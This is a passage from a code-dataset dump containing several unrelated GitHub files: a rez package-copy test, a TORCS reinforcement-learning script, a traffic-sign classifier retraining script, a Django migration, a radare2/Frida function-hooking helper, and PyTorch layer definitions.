create_build_system(working_dir)\n return create_build_process(process_type=\"local\",\n working_dir=working_dir,\n build_system=buildsys)\n\n @classmethod\n def _build_package(cls, name, version=None):\n # create the builder\n working_dir = os.path.join(cls.src_root, name)\n if version:\n working_dir = os.path.join(working_dir, version)\n builder = cls._create_builder(working_dir)\n\n builder.build(install_path=cls.install_root, install=True, clean=True)\n\n def _reset_dest_repository(self):\n system.clear_caches()\n if os.path.exists(self.dest_install_root):\n shutil.rmtree(self.dest_install_root)\n\n os.makedirs(self.dest_install_root)\n\n def _get_src_pkg(self, name, version):\n return get_latest_package(\n name,\n range_=VersionRange(\"==\" + version),\n paths=[self.install_root],\n error=True\n )\n\n def _get_dest_pkg(self, name, version):\n return get_latest_package(\n name,\n range_=VersionRange(\"==\" + version),\n paths=[self.dest_install_root],\n error=True\n )\n\n def _assert_copied(self, result, copied, skipped):\n self.assertEqual(len(result[\"copied\"]), copied)\n self.assertEqual(len(result[\"skipped\"]), skipped)\n\n def test_1(self):\n \"\"\"Simple package copy, no variants, no overwrite.\"\"\"\n self._reset_dest_repository()\n\n # make a copy of a package\n src_pkg = self._get_src_pkg(\"floob\", \"1.2.0\")\n result = copy_package(\n package=src_pkg,\n dest_repository=self.dest_install_root\n )\n\n self._assert_copied(result, 1, 0)\n\n # check the copied package exists and matches\n dest_pkg = self._get_dest_pkg(\"floob\", \"1.2.0\")\n result_variant = result[\"copied\"][0][1]\n dest_variant = next(dest_pkg.iter_variants())\n self.assertEqual(dest_variant.handle, result_variant.handle)\n\n pyfile = os.path.join(dest_pkg.base, \"python\", \"floob\", \"__init__.py\")\n ctime = os.stat(pyfile).st_ctime\n\n # copy again but with overwrite=False; should do nothing\n result = copy_package(\n package=src_pkg,\n dest_repository=self.dest_install_root\n )\n\n self._assert_copied(result, 0, 1)\n\n # check that package payload wasn't overwritten\n self.assertEqual(os.stat(pyfile).st_ctime, ctime)\n\n def test_2(self):\n \"\"\"Package copy, no variants, overwrite.\"\"\"\n self._reset_dest_repository()\n\n # make a copy of a package\n src_pkg = self._get_src_pkg(\"floob\", \"1.2.0\")\n copy_package(\n package=src_pkg,\n dest_repository=self.dest_install_root\n )\n\n dest_pkg = self._get_dest_pkg(\"floob\", \"1.2.0\")\n\n pyfile = os.path.join(dest_pkg.base, \"python\", \"floob\", \"__init__.py\")\n ctime = os.stat(pyfile).st_ctime\n\n # overwrite same package copy\n result = copy_package(\n package=src_pkg,\n dest_repository=self.dest_install_root,\n overwrite=True\n )\n\n self._assert_copied(result, 1, 0)\n\n # check that package payload was overwritten\n self.assertNotEqual(os.stat(pyfile).st_ctime, ctime)\n\n def test_3(self):\n \"\"\"Package copy, variants, overwrite and non-overwrite.\"\"\"\n self._reset_dest_repository()\n\n # make a copy of a varianted package\n src_pkg = self._get_src_pkg(\"bah\", \"2.1\")\n result = copy_package(\n package=src_pkg,\n dest_repository=self.dest_install_root\n )\n\n self._assert_copied(result, 2, 0) # 2 variants\n\n # check the copied variants exist and match\n dest_pkg = self._get_dest_pkg(\"bah\", \"2.1\")\n ctimes = []\n\n for index in (0, 1):\n result_variant = result[\"copied\"][index][1]\n dest_variant = dest_pkg.get_variant(index)\n self.assertEqual(dest_variant.handle, result_variant.handle)\n\n pyfile = os.path.join(dest_variant.root, \"python\", \"bah\", \"__init__.py\")\n ctime = os.stat(pyfile).st_ctime\n ctimes.append(ctime)\n\n # copy variant with no overwrite, should do nothing\n result = copy_package(\n package=src_pkg,\n dest_repository=self.dest_install_root,\n variants=[1]\n )\n\n self._assert_copied(result, 0, 1)\n\n # copy variant with overwrite\n result = copy_package(\n package=src_pkg,\n dest_repository=self.dest_install_root,\n variants=[1],\n overwrite=True\n )\n\n self._assert_copied(result, 1, 0)\n\n # check copied variant is the one we expect\n dest_pkg = self._get_dest_pkg(\"bah\", \"2.1\")\n result_variant = result[\"copied\"][0][1]\n dest_variant = dest_pkg.get_variant(1)\n self.assertEqual(dest_variant.handle, result_variant.handle)\n\n # check copied variant payload was overwritten\n pyfile = os.path.join(dest_variant.root, \"python\", \"bah\", \"__init__.py\")\n self.assertNotEqual(os.stat(pyfile).st_ctime, ctimes[1])\n\n # check non-copied variant payload was not written\n skipped_variant = dest_pkg.get_variant(0)\n pyfile = os.path.join(skipped_variant.root, \"python\", \"bah\", \"__init__.py\")\n self.assertEqual(os.stat(pyfile).st_ctime, ctimes[0])\n\n def test_4(self):\n \"\"\"Package copy with rename, reversion.\"\"\"\n self._reset_dest_repository()\n\n # copy a package to a different name and version\n src_pkg = self._get_src_pkg(\"floob\", \"1.2.0\")\n result = copy_package(\n package=src_pkg,\n dest_repository=self.dest_install_root,\n dest_name=\"flaab\",\n dest_version=\"5.4.1\"\n )\n\n self._assert_copied(result, 1, 0)\n\n # check copied variant is the one we expect\n dest_pkg = self._get_dest_pkg(\"flaab\", \"5.4.1\")\n result_variant = result[\"copied\"][0][1]\n dest_variant = next(dest_pkg.iter_variants())\n self.assertEqual(dest_variant.handle, result_variant.handle)\n\n def test_5(self):\n \"\"\"Package copy with standard, new timestamp.\"\"\"\n self._reset_dest_repository()\n\n # wait 1 second to guarantee newer timestamp in copied pkg\n time.sleep(1)\n\n # copy package and overwrite timestamp\n src_pkg = self._get_src_pkg(\"floob\", \"1.2.0\")\n copy_package(\n package=src_pkg,\n dest_repository=self.dest_install_root\n )\n\n # check copied variant contains expected timestamp\n dest_pkg = self._get_dest_pkg(\"floob\", \"1.2.0\")\n self.assertTrue(dest_pkg.timestamp > src_pkg.timestamp)\n\n def test_6(self):\n \"\"\"Package copy with keep_timestamp.\"\"\"\n self._reset_dest_repository()\n\n # wait 1 second to ensure we don't just accidentally get same timestamp\n time.sleep(1)\n\n # copy package and overwrite timestamp\n src_pkg = self._get_src_pkg(\"floob\", \"1.2.0\")\n copy_package(\n package=src_pkg,\n dest_repository=self.dest_install_root,\n keep_timestamp=True\n )\n\n # check copied variant contains expected timestamp\n dest_pkg = self._get_dest_pkg(\"floob\", \"1.2.0\")\n self.assertEqual(dest_pkg.timestamp, src_pkg.timestamp)\n\n def test_7(self):\n \"\"\"Package copy with overrides.\"\"\"\n self._reset_dest_repository()\n\n overrides = {\n \"timestamp\": 10000,\n \"description\": \"this is a copy\",\n \"some_extra_key\": True\n }\n\n # copy package and overwrite timestamp\n src_pkg = self._get_src_pkg(\"floob\", \"1.2.0\")\n copy_package(\n package=src_pkg,\n dest_repository=self.dest_install_root,\n overrides=overrides\n )\n\n # check copied variant contains expected timestamp\n dest_pkg = self._get_dest_pkg(\"floob\", \"1.2.0\")\n\n for k, v in list(overrides.items()):\n self.assertEqual(getattr(dest_pkg, k), v)\n\n def test_8(self):\n \"\"\"Ensure that include modules are copied.\"\"\"\n self._reset_dest_repository()\n\n src_pkg = self._get_src_pkg(\"foo\", \"1.1.0\")\n copy_package(\n package=src_pkg,\n dest_repository=self.dest_install_root,\n )\n\n dest_pkg = self._get_dest_pkg(\"foo\", \"1.1.0\")\n dest_variant = next(dest_pkg.iter_variants())\n\n # do a resolve\n ctxt = ResolvedContext(\n [\"foo==1.1.0\"],\n package_paths=[self.dest_install_root, self.install_root]\n )\n\n resolved_variant = ctxt.get_resolved_package(\"foo\")\n self.assertEqual(dest_variant.handle, resolved_variant.handle)\n\n # this can only match if the include module was copied with the package\n environ = ctxt.get_environ(parent_environ={})\n self.assertEqual(environ.get(\"EEK\"), \"2\")\n","repo_name":"AcademySoftwareFoundation/rez","sub_path":"src/rez/tests/test_copy_package.py","file_name":"test_copy_package.py","file_ext":"py","file_size_in_byte":10779,"program_lang":"python","lang":"en","doc_type":"code","stars":844,"dataset":"github-code","pt":"79"} +{"seq_id":"49527822","text":"import numpy as np\nimport tensorflow as tf\nimport gym\nimport time\nimport argparse\nimport sys\n\nfrom replay_buffer import *\nfrom ac import *\nfrom gym_torcs import TorcsEnv\n\n#-----------------------------------------------------------------------------------------------\n\ndef sac_fn(args):\n\n sess = tf.Session()\n \n sac = SAC(sess, args) \n \n saver = tf.train.Saver()\n\n sac.init_all_vars()\n sac.target_init()\n \n if (args.train_test == 0):\n print('train model ')\n train_sac(sess, args, sac, saver)\n elif (args.train_test == 1):\n print('test model ')\n test_sac(sess, args, sac, saver)\n else:\n print('wrong entry for train_test: ', args.train_test) \n sys.exit()\n\n#-------------------------------------------------------------------------------\n\ndef train_sac(sess, args, sac, saver):\n\n env = TorcsEnv(vision=False, throttle=True, gear_change=False)\n \n replay_buffer = ReplayBuffer(args.s_dim, args.a_dim, args.buff_size)\n\n for ep in range(args.total_ep):\n\n if np.mod(ep, 100) == 0:\n ob = env.reset(relaunch=True) #relaunch TORCS every N episode because of the memory leak error\n else:\n ob = env.reset()\n\n s = np.hstack((ob.angle, ob.track, ob.trackPos, ob.speedX, ob.speedY, ob.speedZ, ob.wheelSpinVel/100.0, ob.rpm))\n\n\n done = False \n ep_rew = 0.0\n ep_len = 0 \n\n while (not done):\n\n # first 10 episodes, just step on gas, drive straight\n if (ep > 10):\n a = sac.get_action(s)\n else:\n a = np.array([0.0, 1.0, 0.0])\n\n\n ob, r, done, _ = env.step(a)\n s2 = np.hstack((ob.angle, ob.track, ob.trackPos, ob.speedX, ob.speedY, ob.speedZ, ob.wheelSpinVel/100.0, ob.rpm)) \n\n ep_rew += r\n ep_len += 1\n\n if (ep_len >= args.max_ep_len):\n done = True\n\n replay_buffer.store(s, a, r, s2, float(done))\n\n s = s2\n\n batch = replay_buffer.sample_batch(args.batch_size)\n outs = sac.train(batch)\n\n \n print('episode: ', ep, ' | episode rewards: ', round(ep_rew,4), ' | episode length: ', ep_len, ' | alpha/temperature: ', outs[9]) \n with open(\"performance.txt\", \"a\") as myfile:\n myfile.write(str(ep) + \" \" + str(ep_len) + \" \" + str(round(ep_rew,4)) + \" \" + str(round(outs[9],4)) + \"\\n\") \n\n if (ep % 10 == 0):\n # save model \n saver.save(sess, 'ckpt/model') \n\n#------------------------------------------------------------------------------- \n\ndef test_sac(sess, args, sac, saver):\n\n saver.restore(sess, 'ckpt/model')\n \n env = TorcsEnv(vision=False, throttle=True, gear_change=False)\n\n ob = env.reset(relaunch=True) #relaunch TORCS every N episode because of the memory leak error\n \n s = np.hstack((ob.angle, ob.track, ob.trackPos, ob.speedX, ob.speedY, ob.speedZ, ob.wheelSpinVel/100.0, ob.rpm))\n \n done = False \n ep_rew = 0.0\n ep_len = 0 \n\n while (not done):\n \n # deterministic actions at test time\n a = sac.get_action(s, True) \n \n ob, r, done, _ = env.step(a)\n s = np.hstack((ob.angle, ob.track, ob.trackPos, ob.speedX, ob.speedY, ob.speedZ, ob.wheelSpinVel/100.0, ob.rpm))\n\n ep_rew += r\n ep_len += 1\n\n if (ep_len >= args.max_ep_len):\n done = True\n\n print('test time performance: | rewards: ', ep_rew, ' | length: ', ep_len) \n\n#------------------------------------------------------------------------------- \n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--s_dim', type=int, default=29)\n parser.add_argument('--a_dim', type=int, default=3)\n\n parser.add_argument('--gamma', type=float, default=0.99)\n parser.add_argument('--total_ep', type=int, default=2000)\n parser.add_argument('--max_ep_len', type=int, default=1000)\n parser.add_argument('--lr', type=float, default=1e-4)\n parser.add_argument('--polyak', type=float, default=0.995)\n parser.add_argument('--buff_size', type=int, default=int(5e5))\n parser.add_argument('--batch_size', type=int, default=128)\n\n # train_test = 0 for train; = 1 for test\n parser.add_argument('--train_test', type=int, default=1)\n \n args = parser.parse_args()\n\n sac_fn(args)\n","repo_name":"kaushikb258/SAC_Torcs","sub_path":"sac.py","file_name":"sac.py","file_ext":"py","file_size_in_byte":4520,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"} +{"seq_id":"33380150201","text":"import os\n\nimport cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom keras import models\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.utils.np_utils import to_categorical\nfrom sklearn.model_selection import train_test_split\n\n# Parameters\n\npath = \"myData\" # folder with all the class folders\nlabelFile = 'labels.csv' # file with all names of classes\nbatch_size_val = 50 # how many to process together\n# steps_per_epoch_val = 1000\nepochs_val = 100\nimageDimensions = (32, 32, 3)\ntestRatio = 0.2 # if 1000 images split will 200 for testing\nvalidationRatio = 0.2 # if 1000 images 20% of remaining 800 will be 160 for validation\n\n# Importing of the Images\ncount = 0\nimages = []\nclassNo = []\nmyList = os.listdir(path)\nprint(\"Total Classes Detected:\", len(myList))\nnoOfClasses = len(myList)\nprint(\"Importing Classes...\")\nfor x in range(0, len(myList)):\n myPicList = os.listdir(path + \"/\" + str(count))\n for y in myPicList:\n curImg = cv2.imread(path + \"/\" + str(count) + \"/\" + y)\n images.append(curImg)\n classNo.append(count)\n print(count, end=\" \")\n count += 1\nprint(\" \")\nimages = np.array(images)\nclassNo = np.array(classNo)\n\n# Split Data\nX_train, X_test, y_train, y_test = train_test_split(images, classNo, test_size=testRatio)\nX_train, X_validation, y_train, y_validation = train_test_split(X_train, y_train, test_size=validationRatio)\n\n# X_train = ARRAY OF IMAGES TO TRAIN\n# y_train = CORRESPONDING CLASS ID\n\n# TO CHECK IF NUMBER OF IMAGES MATCHES TO NUMBER OF LABELS FOR EACH DATA SET\nprint(\"Data Shapes\")\nprint(\"Train\", end=\"\")\nprint(X_train.shape, y_train.shape)\nprint(\"Validation\", end=\"\")\nprint(X_validation.shape, y_validation.shape)\nprint(\"Test\", end=\"\")\nprint(X_test.shape, y_test.shape)\nassert (X_train.shape[0] == y_train.shape[\n 0]), \"The number of images in not equal to the number of labels in training set\"\nassert (X_validation.shape[0] == y_validation.shape[\n 0]), \"The number of images in not equal to the number of labels in validation set\"\nassert (X_test.shape[0] == y_test.shape[0]), \"The number of images in not equal to the number of labels in test set\"\nassert (X_train.shape[1:] == imageDimensions), \" The dimensions of the Training images are wrong \"\nassert (X_validation.shape[1:] == imageDimensions), \" The dimensions of the Validation images are wrong \"\nassert (X_test.shape[1:] == imageDimensions), \" The dimensions of the Test images are wrong\"\n\n# READ CSV FILE\ndata = pd.read_csv(labelFile)\nprint(\"data shape \", data.shape, type(data))\n\n\n# PREPROCESSING THE IMAGES\ndef preprocessing(img):\n img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) # CONVERT TO GRAYSCALE\n img = cv2.equalizeHist(img) # STANDARDIZE THE LIGHTING IN AN IMAGE\n img = img / 255 # TO NORMALIZE VALUES BETWEEN 0 AND 1 INSTEAD OF 0 TO 255\n return img\n\n\nX_train = np.array(list(map(preprocessing, X_train))) # TO ITERATE AND PREPROCESS ALL IMAGES\nX_validation = np.array(list(map(preprocessing, X_validation)))\nX_test = np.array(list(map(preprocessing, X_test)))\n\n# ADD A DEPTH OF 1\nX_train = X_train.reshape(X_train.shape[0], 32, 32, 1)\nX_validation = X_validation.reshape(X_validation.shape[0], 32, 32, 1)\nX_test = X_test.reshape(X_test.shape[0], 32, 32, 1)\n\n# AUGMENTATION OF IMAGES: TO MAKEIT MORE GENERIC\ndataGen = ImageDataGenerator(width_shift_range=0.1,\n # 0.1 = 10% IF MORE THAN 1 E.G 10 THEN IT REFERS TO NO. OF PIXELS EG 10 PIXELS\n height_shift_range=0.1,\n zoom_range=0.2, # 0.2 MEANS CAN GO FROM 0.8 TO 1.2\n shear_range=0.1, # MAGNITUDE OF SHEAR ANGLE\n rotation_range=10) # DEGREES\ndataGen.fit(X_train)\nbatches = dataGen.flow(X_train, y_train,\n batch_size=20) # REQUESTING DATA GENERATOR TO GENERATE IMAGES BATCH SIZE = NO. OF IMAGES CREATED EACH TIME ITS CALLED\nX_batch, y_batch = next(batches)\n\ny_train = to_categorical(y_train, noOfClasses)\ny_validation = to_categorical(y_validation, noOfClasses)\ny_test = to_categorical(y_test, noOfClasses)\n\n\n# TRAIN\nmodel = models.load_model('sign_classifier_v1.4.model')\nprint(model.summary())\nhistory = model.fit(dataGen.flow(X_train, y_train, batch_size=batch_size_val),\n epochs=epochs_val, # steps_per_epoch=steps_per_epoch_val,\n validation_data=(X_validation, y_validation), shuffle=1)\n\n# PLOT\nplt.figure(1)\nplt.plot(history.history['loss'])\nplt.plot(history.history['val_loss'])\nplt.legend(['training', 'validation'])\nplt.title('loss')\nplt.xlabel('epoch')\nplt.figure(2)\nplt.plot(history.history['accuracy'])\nplt.plot(history.history['val_accuracy'])\nplt.legend(['training', 'validation'])\nplt.title('Accuracy')\nplt.xlabel('epoch')\nplt.show()\nscore = model.evaluate(X_test, y_test, verbose=0)\nprint('Test Score:', score[0])\nprint('Test Accuracy:', score[1])\n\n# STORE THE MODEL AS A PICKLE OBJECT\nmodel.save('sign_classifier_v1.5.model')\ncv2.waitKey(0)\n","repo_name":"yashanksingh/Traffic-Sign-Recognition","sub_path":"early-testing/retraining.py","file_name":"retraining.py","file_ext":"py","file_size_in_byte":5016,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"23966613649","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('catalogue', '0005_setup_product_models'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='product',\n name='ordering',\n field=models.PositiveIntegerField(default=0),\n preserve_default=True,\n ),\n ]\n","repo_name":"SmallsLIVE/smallslive","sub_path":"smallslive/oscar_apps/catalogue/migrations/0006_product_ordering.py","file_name":"0006_product_ordering.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"79"} +{"seq_id":"72606741374","text":"#!/home/nitanmarcel/.pyenv/shims/python\nimport r2pipe\nimport frida\n\nimport os\n\nimport argparse\nfrom argparse import RawTextHelpFormatter\nfrom urllib.parse import urlparse\n\nUSAGE = f\"\"\"\n[spawn/attach]://[usb/local]/[appname/pid]\n\nAttach to a local pid: attach://1234\n\nSpawn a local application: attach://'App Name'\n\nSame can be used for usb devices, but using /usb/ befor the app name\n\nattach://usb/1234\n\n\"\"\"\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(formatter_class=RawTextHelpFormatter)\n parser.add_argument('command', help=USAGE)\n\n args = parser.parse_args()\n\n parsed_url = urlparse(args.command)\n\n scheme = parsed_url.scheme\n netloc = parsed_url.netloc\n path = parsed_url.path\n\n if not scheme or scheme not in ['spawn', 'attach']:\n print(USAGE)\n elif not netloc:\n print(USAGE)\n else:\n _type = 'attach'\n _target = 'local'\n appname = ''\n if scheme == 'spawn':\n _type = 'spawn'\n else:\n _type = 'attach'\n if netloc not in ['usb', 'local'] or not path:\n appname = netloc\n if path:\n appname = appname + path\n elif netloc == 'usb':\n _target = 'usb'\n if scheme == 'spawn':\n _type = 'spawn'\n if path:\n appname = path[1:]\n\n return _type, _target, appname\n\n# #!pipe ./frd.py usb spawn com.openai.chatgpt\n\n\nBASE_TEMPLATE = \"\"\"\nconsole.log('LOADED')\n\nvar hooked = false\nconst library = '$(LIBRARY)'\n\nfunction doHook() {\n if (!hooked) {\n try {\n Module.ensureInitialized(library);\n hooked = true\n var base = Module.findBaseAddress(library)\n\n $(INTERCEPT)\n } catch (err) {\n throw err\n }\n }\n}\n\nsetInterval(doHook, 0)\n\"\"\"\n\nINTERCEPT_TEMPLATE = \"\"\"\nvar address = $(ADDRESS)\nvar target = base.add(address)\nInterceptor.attach(target, {\n onEnter: function(args) {\n this._target = target\n console.log('\\\\n', target, 'ENTER')\n console.log('----------------------------------')\n var aArgs = $(ARGS)\n aArgs.forEach((element, index) => {\n var arg = args[index]\n // Try to guess the type\n try {\n arg = args[index].toUInt32()\n } catch {\n\n }\n try {\n arg = Memory.readUtf8String(args[index])\n } catch {\n\n }\n console.log('\\\\n', 'ARG', '(' + element.name + ')', ':')\n console.log('++++++++++++++++++++++++++++++++++')\n console.log(arg)\n console.log('**********************************\\\\n')\n });\n },\n onLeave: function(retval) {\n console.log(this._target, 'LEAVE')\n var res = retval\n\n // Try to guess the type\n try {\n res = retval.toUInt32()\n } catch {\n\n }\n try {\n res = Memory.readUtf8String(retval)\n } catch {\n\n }\n console.log('++++++++++++++++++++++++++++++++++')\n console.log('RETVAL ', res)\n console.log('**********************************\\\\n')\n }\n})\n\n\"\"\"\n\n\ndef main():\n target, device, appname = parse_args()\n\n r2 = r2pipe.open()\n\n info = r2.cmdj('ij')\n library = os.path.basename(info['core']['file'])\n\n address = r2.cmd('s')\n\n args = r2.cmdj('afvj %s' % address)\n\n intercept_script = \"\"\n aargs = []\n if args:\n for arg in args['reg']:\n name, type = arg['name'], arg['type']\n aargs.append({'name': name, 'type': type})\n\n intercept_script = INTERCEPT_TEMPLATE.replace(\n '$(ADDRESS)', address).replace('$(ARGS)', str(aargs))\n\n # $(LIBRARY) $(INTERCEPT)\n script = BASE_TEMPLATE.replace('$(LIBRARY)', library).replace(\n '$(INTERCEPT)', intercept_script)\n\n if device == 'local':\n device = frida.get_local_device()\n else:\n device = frida.get_usb_device()\n\n if target == 'spawn':\n pid = device.spawn(appname)\n else:\n pid = device.attach(int(appname) if appname.isdigit() else appname)\n\n session = device.attach(pid)\n\n script = session.create_script(script)\n script.load()\n\n device.resume(pid)\n\n input('Press any key to stop : ')\n\n try:\n script.unload()\n except (KeyboardInterrupt, frida.InvalidOperationError):\n pass\n\n\nif __name__ == '__main__':\n try:\n main()\n except Exception as exc:\n print(exc.__class__.__name__, exc, sep=' : ')\n","repo_name":"nitanmarcel/r2-tools","sub_path":"r2frd/r2frd.py","file_name":"r2frd.py","file_ext":"py","file_size_in_byte":4493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"73524397374","text":"from torch import nn as nn\nfrom torch.nn import functional as F\nimport torch,time,os,random\nimport numpy as np\nfrom collections import OrderedDict\nfrom torch import nn as nn, einsum\nfrom einops import rearrange\nfrom math import floor, ceil\n\nclass MLP_old(nn.Module):\n def __init__(self, inSize, outSize, hiddenSizeList=[], dropout=0.0, name='MLP', actFunc=nn.ReLU, bn=False, outAct=False):\n super(MLP_old, self).__init__()\n self.name = name\n self.bn = nn.BatchNorm1d(inSize) if bn else None\n layers = nn.Sequential()\n for i,os in enumerate(hiddenSizeList):\n layers.add_module(str(i*2), nn.Linear(inSize, os))\n layers.add_module(str(i*2+1), actFunc())\n inSize = os\n self.hiddenLayers = layers\n self.dropout = nn.Dropout(p=dropout)\n self.out = nn.Linear(inSize, outSize)\n self.outAct = actFunc() if outAct else None\n def forward(self, x):\n if self.bn is not None:\n x = self.bn(x)\n x = self.hiddenLayers(x)\n x = self.out(self.dropout(x))\n if self.outAct is not None:\n x = self.outAct(x)\n return x\n\nclass TextEmbedding_old(nn.Module):\n def __init__(self, embeding, freeze=False, dropout=0.2, name='textEmbedding'):\n super(TextEmbedding_old, self).__init__()\n self.embedding = nn.Embedding.from_pretrained(torch.tensor(embeding, dtype=torch.float32), freeze=freeze)\n self.dropout = nn.Dropout(p=dropout)\n self.name = name\n def forward(self, x):\n return self.dropout(self.embedding(x))\n\nclass TextSPP(nn.Module):\n def __init__(self, size=128, name='textSpp'):\n super(TextSPP, self).__init__()\n self.name = name\n self.spp = nn.AdaptiveAvgPool1d(size)\n def forward(self, x):\n return self.spp(x)\n\nclass TextSPP2(nn.Module):\n def __init__(self, size=128, name='textSpp2'):\n super(TextSPP2, self).__init__()\n self.name = name\n self.spp1 = nn.AdaptiveMaxPool1d(size)\n self.spp2 = nn.AdaptiveAvgPool1d(size)\n def forward(self, x):\n x1 = self.spp1(x).unsqueeze(dim=3) # => batchSize × feaSize × size × 1\n x2 = self.spp2(x).unsqueeze(dim=3) # => batchSize × feaSize × size × 1\n x3 = -self.spp1(-x).unsqueeze(dim=3) # => batchSize × feaSize × size × 1\n return torch.cat([x1,x2,x3], dim=3) # => batchSize × feaSize × size × 3\n\nclass TextEmbedding(nn.Module):\n def __init__(self, embedding, dropout=0.3, freeze=False, name='textEmbedding'):\n super(TextEmbedding, self).__init__()\n self.name = name\n self.embedding = nn.Embedding.from_pretrained(torch.tensor(embedding,dtype=torch.float32), freeze=freeze)\n self.dropout1 = nn.Dropout2d(p=dropout/2)\n self.dropout2 = nn.Dropout(p=dropout/2)\n self.p = dropout\n def forward(self, x):\n # x: batchSize × seqLen\n if self.p>0:\n x = self.dropout2(self.dropout1(self.embedding(x)))\n else:\n x = self.embedding(x)\n return x\n\nclass TextEmbedding_1d(nn.Module):\n def __init__(self, embedding, dropout=0.3, freeze=False, name='textEmbedding'):\n super(TextEmbedding_1d, self).__init__()\n self.name = name\n self.embedding = nn.Embedding.from_pretrained(torch.tensor(embedding,dtype=torch.float32), freeze=freeze)\n # self.dropout1 = nn.Dropout2d(p=dropout/2)\n self.dropout = nn.Dropout(p=dropout/2)\n def forward(self, x):\n return self.dropout(self.embedding(x))\n\n\n \nclass ResDilaCNNBlock(nn.Module):\n def __init__(self, dilaSize, filterSize=64, dropout=0.15, name='ResDilaCNNBlock'):\n super(ResDilaCNNBlock, self).__init__()\n self.layers = nn.Sequential(\n nn.ELU(),\n nn.Conv1d(filterSize,filterSize,kernel_size=3,padding=dilaSize,dilation=dilaSize),\n nn.InstanceNorm1d(filterSize),\n nn.ELU(),\n nn.Dropout(dropout),\n nn.Conv1d(filterSize,filterSize,kernel_size=3,padding=dilaSize,dilation=dilaSize),\n nn.InstanceNorm1d(filterSize),\n )\n self.name = name\n def forward(self, x):\n # x: batchSize × filterSize × seqLen\n return x + self.layers(x)\n\nclass ResDilaCNNBlocks(nn.Module):\n def __init__(self, feaSize, filterSize, blockNum=10, dilaSizeList=[1,2,4,8,16], dropout=0.15, name='ResDilaCNNBlocks'):\n super(ResDilaCNNBlocks, self).__init__()\n self.blockLayers = nn.Sequential()\n self.linear = nn.Linear(feaSize,filterSize)\n for i in range(blockNum):\n self.blockLayers.add_module(f\"ResDilaCNNBlock{i}\", ResDilaCNNBlock(dilaSizeList[i%len(dilaSizeList)],filterSize,dropout=dropout))\n self.name = name\n def forward(self, x):\n # x: batchSize × seqLen × feaSize\n x = self.linear(x) # => batchSize × seqLen × filterSize\n x = self.blockLayers(x.transpose(1,2)).transpose(1,2) # => batchSize × seqLen × filterSize\n return F.elu(x) # => batchSize × seqLen × filterSize\n\nclass BatchNorm1d(nn.Module):\n def __init__(self, inSize, name='batchNorm1d'):\n super(BatchNorm1d, self).__init__()\n self.bn = nn.BatchNorm1d(inSize)\n self.name = name\n def forward(self, x):\n return self.bn(x)\n\n# class TextCNN(nn.Module):\n# def __init__(self, featureSize, filterSize, contextSizeList, reduction='pool', actFunc=nn.ReLU, bn=False, name='textCNN'):\n# super(TextCNN, self).__init__()\n# moduleList = []\n# for i in range(len(contextSizeList)):\n# moduleList.append(\n# nn.Conv1d(in_channels=featureSize, out_channels=filterSize, kernel_size=contextSizeList[i], padding=contextSizeList[i]//2),\n# )\n# self.actFunc = actFunc()\n# self.conv1dList = nn.ModuleList(moduleList)\n# self.reduction = reduction\n# self.batcnNorm = nn.BatchNorm1d(filterSize)\n# self.bn = bn\n# self.name = name\n# def forward(self, x):\n# # x: batchSize × seqLen × feaSize\n# x = x.transpose(1,2) # => batchSize × feaSize × seqLen\n# x = [conv(x).transpose(1,2) for conv in self.conv1dList] # => scaleNum * (batchSize × seqLen × filterSize)\n\n# if self.bn:\n# x = [self.batcnNorm(i) for i in x]\n# x = [self.actFunc(i) for i in x]\n\n# if self.reduction=='pool':\n# x = [F.adaptive_max_pool1d(i.transpose(1,2), 1).squeeze(dim=2) for i in x]\n# return torch.cat(x, dim=1) # => batchSize × scaleNum*filterSize\n# elif self.reduction=='cpool':\n# x = torch.cat([i.unsqueeze(dim=3) for i in x], dim=3)\n# return torch.max(x, 3)[0] # => batchSize × seqLen × filterSize\n# elif self.reduction=='none':\n# return x # => scaleNum * (batchSize × seqLen × filterSize)\n\n# 使用Tanh激活\nclass TextCNN(nn.Module):\n def __init__(self, featureSize, filterSize, contextSizeList, reduction='pool', actFunc=nn.ReLU, bn=False, name='textCNN'):\n super(TextCNN, self).__init__()\n moduleList = []\n for i in range(len(contextSizeList)):\n moduleList.append(\n nn.Conv1d(in_channels=featureSize, out_channels=filterSize, kernel_size=contextSizeList[i], padding=contextSizeList[i]//2),\n )\n # self.actFunc = actFunc()\n self.conv1dList = nn.ModuleList(moduleList)\n self.reduction = reduction\n self.batcnNorm = nn.BatchNorm1d(filterSize)\n self.bn = bn\n self.name = name\n def forward(self, x):\n # x: batchSize × seqLen × feaSize\n x = x.transpose(1,2) # => batchSize × feaSize × seqLen\n x = [conv(x).transpose(1,2) for conv in self.conv1dList] # => scaleNum * (batchSize × seqLen × filterSize)\n\n if self.bn:\n x = [self.batcnNorm(i) for i in x]\n x = [F.tanh(i) for i in x]\n\n if self.reduction=='pool':\n x = [F.adaptive_max_pool1d(i.transpose(1,2), 1).squeeze(dim=2) for i in x]\n return torch.cat(x, dim=1) # => batchSize × scaleNum*filterSize\n elif self.reduction=='cpool':\n x = torch.cat([i.unsqueeze(dim=3) for i in x], dim=3)\n return torch.max(x, 3)[0] # => batchSize × seqLen × filterSize\n elif self.reduction=='none':\n return x # => scaleNum * (batchSize × seqLen × filterSize)\n\nclass TextLSTM(nn.Module):\n def __init__(self, feaSize, hiddenSize, num_layers=1, dropout=0.0, bidirectional=True, name='textBiLSTM'):\n super(TextLSTM, self).__init__()\n self.name = name\n self.biLSTM = nn.LSTM(feaSize, hiddenSize, bidirectional=bidirectional, batch_first=True, num_layers=num_layers, dropout=dropout)\n\n def forward(self, x, xlen=None):\n # x: batchSizeh × seqLen × feaSize\n if xlen is not None:\n xlen, indices = torch.sort(xlen, descending=True)\n _, desortedIndices = torch.sort(indices, 